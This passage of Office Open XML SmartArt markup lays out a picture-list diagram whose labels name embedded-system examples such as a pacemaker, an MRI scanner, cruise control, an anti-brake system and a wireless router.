    <dgm:cxn modelId="{3D2BD278-11D1-41A1-99BA-C464291A6EBE}" type="presParOf" srcId="{783292AF-9014-4A62-BBC8-878DC49AB5A4}" destId="{FBAB4971-5511-4168-BBFA-AEF9A99E4E53}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{B84593E0-E599-403A-9820-29F3099F9D71}" type="presParOf" srcId="{71573598-1FDD-48E8-BDFF-3AD2D57F3630}" destId="{A69A5D7C-1710-4005-AC40-061B0FBB7018}" srcOrd="23" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{41D34F92-1CCE-413D-AD29-3B3F7BE82F8E}" type="presParOf" srcId="{71573598-1FDD-48E8-BDFF-3AD2D57F3630}" destId="{14117221-029D-4984-A0EF-1D1B677C2796}" srcOrd="24" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{8B17FFB1-9CCF-4515-A37C-069A1990794F}" type="presParOf" srcId="{14117221-029D-4984-A0EF-1D1B677C2796}" destId="{33B7B567-AD68-4053-AC4C-521BE9AE298D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{AB53B061-F047-400D-B68A-6C9FC36B0FC7}" type="presParOf" srcId="{14117221-029D-4984-A0EF-1D1B677C2796}" destId="{DEACF5C5-D089-4D99-BE01-6CC999C42E08}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{42F959EB-D89A-4D6B-8D4C-28226AE5C624}" type="presParOf" srcId="{71573598-1FDD-48E8-BDFF-3AD2D57F3630}" destId="{13583DCE-8B98-4F38-8BF9-9DB381B09DDA}" srcOrd="25" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{1A4B640D-3196-4F62-89E0-CE450CA0D352}" type="presParOf" srcId="{71573598-1FDD-48E8-BDFF-3AD2D57F3630}" destId="{15772C10-B32F-4790-8D43-6E3C4CBAB5BD}" srcOrd="26" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{FC7A4C5F-5A6C-4D49-923F-A8E5ED5454AE}" type="presParOf" srcId="{15772C10-B32F-4790-8D43-6E3C4CBAB5BD}" destId="{BE49EF2D-5BAE-4242-9B64-5F6C4A850C33}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{57927A40-ADBC-4BD4-A30E-AA05162A4220}" type="presParOf" srcId="{15772C10-B32F-4790-8D43-6E3C4CBAB5BD}" destId="{1C22FC41-245F-4D43-9573-5DF0CE1F4037}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{FA9A97EB-740B-45CD-9555-9294A51CAB1C}" type="presParOf" srcId="{71573598-1FDD-48E8-BDFF-3AD2D57F3630}" destId="{3E8D6751-BD6D-493D-9CE5-50F1F255EBE0}" srcOrd="27" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{B252744C-042E-4CCC-8A12-883BEAF46B11}" type="presParOf" srcId="{71573598-1FDD-48E8-BDFF-3AD2D57F3630}" destId="{E6A202E4-C0FE-4580-A06C-51C4897A1D87}" srcOrd="28" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{DBFA07C7-29A2-4A8F-9A09-F232335D759E}" type="presParOf" srcId="{E6A202E4-C0FE-4580-A06C-51C4897A1D87}" destId="{FCED3C3B-B692-40D6-B5C8-754EFF4FB010}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{281673CF-7E85-4B40-BE2C-2A44A67C2015}" type="presParOf" srcId="{E6A202E4-C0FE-4580-A06C-51C4897A1D87}" destId="{2C96D9FF-9362-433E-8DE7-9631A038E706}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{AE0BD1A9-FCA2-42A7-907A-8944BB4394EE}" type="presParOf" srcId="{71573598-1FDD-48E8-BDFF-3AD2D57F3630}" destId="{D41F6C95-E709-413D-8BA7-23C575DD7B97}" srcOrd="29" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{853F89E7-0478-4C0C-83FD-02460760C8DE}" type="presParOf" srcId="{71573598-1FDD-48E8-BDFF-3AD2D57F3630}" destId="{36DCA552-4D08-480C-B302-7E134B26425B}" srcOrd="30" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{48B39B97-33DF-4732-98A2-9E80F753BD68}" type="presParOf" srcId="{36DCA552-4D08-480C-B302-7E134B26425B}" destId="{99DE3C50-97E1-44F5-BD9A-09F302A7FFB8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{EAE21499-33E6-44F4-9769-68F78EE3A999}" type="presParOf" srcId="{36DCA552-4D08-480C-B302-7E134B26425B}" destId="{C50B5B03-FFB4-4849-AD47-BF1375281454}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{2AF3630B-7BA3-44A5-B043-FD0691AF9735}" type="presParOf" srcId="{71573598-1FDD-48E8-BDFF-3AD2D57F3630}" destId="{B310CD6E-22BA-461C-9891-669AB207A9CD}" srcOrd="31" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{552E5FA7-097E-4A4F-BB70-F1D06B9A4EC3}" type="presParOf" srcId="{71573598-1FDD-48E8-BDFF-3AD2D57F3630}" destId="{A072B642-F86D-4A06-8F72-29643ED4E783}" srcOrd="32" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{5D10CFFC-1F1C-48E7-B134-6EB9145AEA47}" type="presParOf" srcId="{A072B642-F86D-4A06-8F72-29643ED4E783}" destId="{B47C8FBE-8F95-46F4-B293-20B926AAC3A8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{8C89E72C-898C-4DED-B231-51681A9D410D}" type="presParOf" srcId="{A072B642-F86D-4A06-8F72-29643ED4E783}" destId="{59115EBC-E00B-4E8C-8325-159702624E53}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{55042EC4-E183-46CE-98A6-3E9100524B8B}" type="presParOf" srcId="{71573598-1FDD-48E8-BDFF-3AD2D57F3630}" destId="{6ABD193F-9DDA-4538-9261-29DE8DAEE703}" srcOrd="33" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{ECD62AB4-5058-4EE1-AAC5-F2FDBEB4BB65}" type="presParOf" srcId="{71573598-1FDD-48E8-BDFF-3AD2D57F3630}" destId="{FE7CAE52-B60E-410F-B3A9-F32742BA05B0}" srcOrd="34" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{FCF3EB07-190B-4C3F-A6BE-3474C36D6CC6}" type="presParOf" srcId="{FE7CAE52-B60E-410F-B3A9-F32742BA05B0}" destId="{22B78B36-C024-49A1-9C8E-01EB114322B6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{F5029251-704F-431E-B3C9-5BE5E4CFA289}" type="presParOf" srcId="{FE7CAE52-B60E-410F-B3A9-F32742BA05B0}" destId="{138B6328-E8B0-4B36-AD2E-744E6E96CB78}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{7BA6EE18-8150-4536-AA6B-01AA294F8B75}" type="presParOf" srcId="{71573598-1FDD-48E8-BDFF-3AD2D57F3630}" destId="{FCE5B802-EB8E-40FB-A4BE-D94239938E65}" srcOrd="35" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{3CB8CE1A-3C4A-4E0A-A186-E2E53EE8187C}" type="presParOf" srcId="{71573598-1FDD-48E8-BDFF-3AD2D57F3630}" destId="{0DE4B25A-43A5-447E-8C00-961E77F649D7}" srcOrd="36" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{097A8718-759D-4B69-92CC-A072332C7F0F}" type="presParOf" srcId="{0DE4B25A-43A5-447E-8C00-961E77F649D7}" destId="{0F0AEB94-8C0B-4BFD-8D19-E323AFA5101B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{F5DBB857-36A6-425C-9852-BA133F548B6B}" type="presParOf" srcId="{0DE4B25A-43A5-447E-8C00-961E77F649D7}" destId="{A010984D-4B1A-40EB-97BE-95AAD11F6E41}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{7B0338EB-F276-489E-B6A0-F40852E29820}" type="presParOf" srcId="{71573598-1FDD-48E8-BDFF-3AD2D57F3630}" destId="{E048E36F-690C-4B6D-8624-9BC29EABB9AA}" srcOrd="37" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{74BD8D26-00C4-4849-9377-6CD1F60F9046}" type="presParOf" srcId="{71573598-1FDD-48E8-BDFF-3AD2D57F3630}" destId="{8F1CE538-663D-48EB-B83E-414C82770312}" srcOrd="38" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{2B2642FF-C01A-4A26-B581-6C7512C6BB05}" type="presParOf" srcId="{8F1CE538-663D-48EB-B83E-414C82770312}" destId="{DB2C5316-CD6C-44F4-991D-0DCFD2FC4A94}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{640CC4DE-09E9-4614-B32E-EF06871A1BAD}" type="presParOf" srcId="{8F1CE538-663D-48EB-B83E-414C82770312}" destId="{DB8A065E-62C9-40D4-B48E-4EF875F2A0C4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{E55F0C91-68F7-415C-AD56-E8E4FC571344}" type="presParOf" srcId="{71573598-1FDD-48E8-BDFF-3AD2D57F3630}" destId="{BE402A1F-C027-4B00-B3CE-C89B05D5D885}" srcOrd="39" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{90A2F147-3A29-41D0-8D37-E65304B35D62}" type="presParOf" srcId="{71573598-1FDD-48E8-BDFF-3AD2D57F3630}" destId="{D41BFA88-C817-418D-A8D0-BCD4FB3A6BB2}" srcOrd="40" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{1B24CA93-8691-4DCC-940A-83F0492A5820}" type="presParOf" srcId="{D41BFA88-C817-418D-A8D0-BCD4FB3A6BB2}" destId="{7E8157B3-D520-4028-8754-5BE654019855}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{5CE26890-A49E-450C-A9D4-528024179DE1}" type="presParOf" srcId="{D41BFA88-C817-418D-A8D0-BCD4FB3A6BB2}" destId="{DD4C1E79-8A0E-4218-A50D-77E141A90E6E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{FD8D9589-E9E1-4F04-9DB9-78F1DF9310E8}" type="presParOf" srcId="{71573598-1FDD-48E8-BDFF-3AD2D57F3630}" destId="{5F26ED35-361E-4A66-BDF6-FDF86C0511C4}" srcOrd="41" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{F85297DC-78AF-416A-B4FD-61791F74E360}" type="presParOf" srcId="{71573598-1FDD-48E8-BDFF-3AD2D57F3630}" destId="{BC3E2ECB-543B-43A4-ACC4-1652B67DA38E}" srcOrd="42" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{374E1365-087A-4706-8362-B169237FBBA6}" type="presParOf" srcId="{BC3E2ECB-543B-43A4-ACC4-1652B67DA38E}" destId="{F9F8E482-7DA1-4191-A748-B1C924B9A687}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{BF414100-896A-4010-A2C7-6B36F5EDF504}" type="presParOf" srcId="{BC3E2ECB-543B-43A4-ACC4-1652B67DA38E}" destId="{27F9C8D5-820C-43B5-A953-ABA1F58CC315}"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D42D-199A-4F2B-BF55-D9D20D9D5AED}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="407292" y="1332"/>
          <a:ext cx="1140734" cy="785966"/>
        </a:xfrm>
        <a:prstGeom prst="round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CFDBC-021E-4227-855F-C7D0609FCF4E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="407292"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Traffic Control</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="407292" y="787298"/>
        <a:ext cx="1140734" cy="423212"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DB748C07-C8C4-4169-8DA3-EFF334AE3495}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1662148" y="1332"/>
          <a:ext cx="1140734" cy="785966"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">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E709A1-CB34-4D95-BAC8-EA65E5DCCB3D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1662148"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Congestion Control</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1662148" y="787298"/>
        <a:ext cx="1140734" cy="423212"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{43103719-51A3-4C66-B4E4-0BA77BA54AB8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2917004" y="1332"/>
          <a:ext cx="1140734" cy="785966"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">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989C6-D115-43D0-9950-00E497DACD50}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2917004"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MRI Scanner</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2917004" y="787298"/>
        <a:ext cx="1140734" cy="423212"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{71180179-C1F2-4F7F-988E-1917E917F17B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4171860" y="1332"/>
          <a:ext cx="1140734" cy="785966"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">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03984-B2C0-489B-AFF6-1747887610DA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4171860"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Hearing Aid</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4171860" y="787298"/>
        <a:ext cx="1140734" cy="423212"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{552A8E5D-EC78-4EEC-A71D-EC9262974B30}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5426716" y="1332"/>
          <a:ext cx="1140734" cy="785966"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:blipFill rotWithShape="0">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18F91E-B9E0-4E6D-80D2-6952FDA68C9C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5426716"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Pace Maker</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5426716" y="787298"/>
        <a:ext cx="1140734" cy="423212"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3DD1124B-076A-43A2-B3A2-3E3AB0F9996A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6681573" y="1332"/>
          <a:ext cx="1140734" cy="785966"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:blipFill rotWithShape="0">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E4AF96-B854-40BF-8F2D-625D902FFDB3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6681573"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Mirror Control</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6681573" y="787298"/>
        <a:ext cx="1140734" cy="423212"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{AF24C597-9CC2-4EFE-923D-12C6039D9EB9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="407292" y="1324584"/>
          <a:ext cx="1140734" cy="785966"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:blipFill rotWithShape="0">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21A74-4CD7-4F98-95C5-D711CE387FFD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="407292"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Cruise Control</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="407292" y="2110550"/>
        <a:ext cx="1140734" cy="423212"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{700BB1AE-6534-4A5C-938F-C2132C91CDA2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1662148" y="1324584"/>
          <a:ext cx="1140734" cy="785966"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:blipFill rotWithShape="0">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25A88-3F4A-4DA9-9873-F761B2A4B335}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1662148"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Headlight Control</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1662148" y="2110550"/>
        <a:ext cx="1140734" cy="423212"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C5975398-798C-4FF3-993C-982AB1132C33}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2917004" y="1324584"/>
          <a:ext cx="1140734" cy="785966"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId9"/>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34D51-995F-4EF7-A9B1-E05CD0C2B260}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2917004"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Anti-Brake System</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2917004" y="2110550"/>
        <a:ext cx="1140734" cy="423212"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FC4F9896-E787-45DE-80F9-7D2696837477}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4171860" y="1324584"/>
          <a:ext cx="1140734" cy="785966"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId10"/>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A130B-57E1-4C19-BD92-98E000732052}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4171860"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Wireless Router</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4171860" y="2110550"/>
        <a:ext cx="1140734" cy="423212"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CC8F0DA6-554D-4D24-9669-238166AC7F39}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5426716" y="1324584"/>
          <a:ext cx="1140734" cy="785966"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1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9A96A-7C34-42B9-9BB0-D842A445330B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5426716"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Network Switch</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5426716" y="2110550"/>
        <a:ext cx="1140734" cy="423212"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3458FFEA-CD50-41B4-B19E-CC7F2015FCCE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6681573" y="1324584"/>
          <a:ext cx="1140734" cy="785966"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1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AB4971-5511-4168-BBFA-AEF9A99E4E53}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6681573"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Printer/Copier</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6681573" y="2110550"/>
        <a:ext cx="1140734" cy="423212"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{33B7B567-AD68-4053-AC4C-521BE9AE298D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="407292" y="2647836"/>
          <a:ext cx="1140734" cy="785966"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1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CF5C5-D089-4D99-BE01-6CC999C42E08}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="407292"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Graphics / Network Card</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="407292" y="3433802"/>
        <a:ext cx="1140734" cy="423212"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BE49EF2D-5BAE-4242-9B64-5F6C4A850C33}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1662148" y="2647836"/>
          <a:ext cx="1140734" cy="785966"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1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22FC41-245F-4D43-9573-5DF0CE1F4037}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1662148"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Telephone Set</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1662148" y="3433802"/>
        <a:ext cx="1140734" cy="423212"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FCED3C3B-B692-40D6-B5C8-754EFF4FB010}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2917004" y="2647836"/>
          <a:ext cx="1140734" cy="785966"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1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6D9FF-9362-433E-8DE7-9631A038E706}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2917004"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DVD Player</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2917004" y="3433802"/>
        <a:ext cx="1140734" cy="423212"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{99DE3C50-97E1-44F5-BD9A-09F302A7FFB8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4171860" y="2647836"/>
          <a:ext cx="1140734" cy="785966"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:blipFill rotWithShape="0">
